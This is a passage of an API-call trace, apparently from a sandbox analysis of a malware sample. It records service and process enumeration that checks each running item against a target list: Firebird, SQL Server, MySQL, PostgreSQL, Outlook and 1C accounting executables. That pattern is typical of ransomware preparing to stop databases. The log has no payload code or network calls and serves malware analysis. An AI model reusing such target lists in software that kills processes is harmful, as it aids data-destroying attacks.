th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0251.318] CloseHandle (hObject=0x3ac) returned 1 [0251.318] Sleep (dwMilliseconds=0x1f4) [0251.893] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea218 [0252.002] EnumServicesStatusExW (in: hSCManager=0x47ea218, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0252.003] GetLastError () returned 0xea [0252.003] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0252.003] EnumServicesStatusExW (in: hSCManager=0x47ea218, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0252.003] CloseServiceHandle (hSCObject=0x47ea218) returned 1 [0252.003] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0252.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0252.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0252.003] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0252.003] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0252.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0252.003] lstrlenW (lpString="AudioSrv") returned 8 [0252.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0252.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0252.004] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0252.004] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0252.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0252.004] lstrlenW (lpString="BFE") returned 3 [0252.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0252.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0252.004] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0252.004] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0252.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0252.004] lstrlenW (lpString="CryptSvc") returned 8 [0252.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0252.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0252.004] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0252.004] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0252.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0252.004] lstrlenW (lpString="CscService") returned 10 [0252.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0252.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0252.004] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0252.004] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0252.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0252.004] lstrlenW (lpString="DcomLaunch") returned 10 [0252.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0252.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0252.004] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0252.004] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0252.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0252.004] lstrlenW (lpString="Dhcp") returned 4 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0252.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0252.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0252.005] lstrlenW (lpString="Dnscache") returned 8 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0252.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0252.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0252.005] lstrlenW (lpString="DPS") returned 3 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0252.005] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0252.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0252.005] lstrlenW (lpString="eventlog") returned 8 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0252.005] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0252.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0252.005] lstrlenW (lpString="EventSystem") returned 11 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0252.005] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0252.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0252.005] lstrlenW (lpString="gpsvc") returned 5 [0252.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0252.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0252.005] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0252.006] lstrlenW (lpString="LanmanWorkstation") returned 17 [0252.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0252.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0252.006] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0252.006] lstrlenW (lpString="lmhosts") returned 7 [0252.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0252.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0252.006] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0252.006] lstrlenW (lpString="MMCSS") returned 5 [0252.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0252.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0252.006] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0252.006] lstrlenW (lpString="MpsSvc") returned 6 [0252.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0252.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0252.006] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0252.006] lstrlenW (lpString="NlaSvc") returned 6 [0252.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0252.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0252.006] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0252.006] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0252.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0252.007] lstrlenW (lpString="nsi") returned 3 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0252.007] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0252.007] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0252.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0252.007] lstrlenW (lpString="PcaSvc") returned 6 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0252.007] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0252.007] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0252.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0252.007] lstrlenW (lpString="PlugPlay") returned 8 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0252.007] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0252.007] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0252.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0252.007] lstrlenW (lpString="Power") returned 5 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0252.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0252.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0252.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0252.007] lstrlenW (lpString="ProfSvc") returned 7 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0252.007] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0252.007] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0252.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0252.007] lstrlenW (lpString="RpcEptMapper") returned 12 [0252.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0252.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0252.008] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0252.008] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0252.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0252.008] lstrlenW (lpString="RpcSs") returned 5 [0252.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0252.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0252.008] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0252.008] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0252.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0252.008] lstrlenW (lpString="SamSs") returned 5 [0252.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0252.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0252.008] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0252.008] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0252.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0252.008] lstrlenW (lpString="Schedule") returned 8 [0252.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0252.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0252.008] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0252.008] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0252.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0252.008] lstrlenW (lpString="SENS") returned 4 [0252.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0252.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0252.009] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0252.009] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0252.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0252.009] lstrlenW (lpString="ShellHWDetection") returned 16 [0252.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0252.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0252.009] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0252.009] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0252.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0252.009] lstrlenW (lpString="Spooler") returned 7 [0252.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0252.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0252.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0252.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0252.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0252.009] lstrlenW (lpString="SysMain") returned 7 [0252.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0252.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0252.009] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0252.009] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0252.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0252.009] lstrlenW (lpString="Themes") returned 6 [0252.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0252.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0252.010] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0252.010] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0252.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0252.010] lstrlenW (lpString="UxSms") returned 5 [0252.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0252.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0252.010] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0252.010] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0252.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0252.010] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0252.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b8 [0252.011] Process32FirstW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.011] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.012] lstrlenW (lpString="System") returned 6 [0252.012] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0252.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0252.012] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.012] lstrlenW (lpString="smss.exe") returned 8 [0252.012] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0252.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0252.012] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.013] lstrlenW (lpString="csrss.exe") returned 9 [0252.013] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0252.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0252.013] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0252.013] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0252.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0252.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0252.013] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0252.013] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.013] lstrlenW (lpString="wininit.exe") returned 11 [0252.013] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0252.013] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0252.013] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.014] lstrlenW (lpString="csrss.exe") returned 9 [0252.014] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0252.014] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0252.014] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0252.014] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0252.014] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0252.014] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0252.014] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0252.014] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.014] lstrlenW (lpString="winlogon.exe") returned 12 [0252.014] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0252.014] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0252.014] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0252.014] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0252.014] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0252.015] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0252.015] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0252.015] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.015] lstrlenW (lpString="services.exe") returned 12 [0252.015] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0252.015] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0252.015] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.015] lstrlenW (lpString="lsass.exe") returned 9 [0252.015] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0252.015] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0252.015] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0252.015] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0252.015] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0252.015] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0252.016] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0252.016] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.016] lstrlenW (lpString="lsm.exe") returned 7 [0252.016] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0252.016] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0252.016] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0252.016] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0252.016] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0252.016] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0252.016] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0252.016] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.016] lstrlenW (lpString="svchost.exe") returned 11 [0252.016] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.016] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.017] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.017] lstrlenW (lpString="svchost.exe") returned 11 [0252.017] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW 